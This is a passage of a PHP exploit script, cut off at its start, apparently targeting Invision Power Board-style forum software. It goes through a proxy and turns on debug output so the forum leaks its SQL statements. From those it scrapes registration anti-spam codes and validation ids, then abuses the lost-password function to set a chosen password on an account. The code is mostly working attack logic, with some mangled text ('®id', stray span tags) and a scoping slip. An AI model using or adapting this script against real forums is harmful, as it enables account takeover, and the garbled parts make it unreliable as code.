INSERT<\/span> INTO ([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } else { $suffix = "&debug=1"; $curl = curl_init($site.'act=Reg&CODE=10'.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } } if (!isset($regid) || !isset($regcode)) { echo "Error: Probably not vulnerable, or no forum found"; exit; } $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}®id={$regid}®_code={$regcode}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/INSERT<\/span> INTO '.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } function change_pass($regcode,$regid,$vid,$userid) { global $site, $proxy, $name, $pass; $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}®id={$regid}®_code={$regcode}&pass1={$pass}&pass2={$pass}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); echo "Password Changed!"; exit; } ?>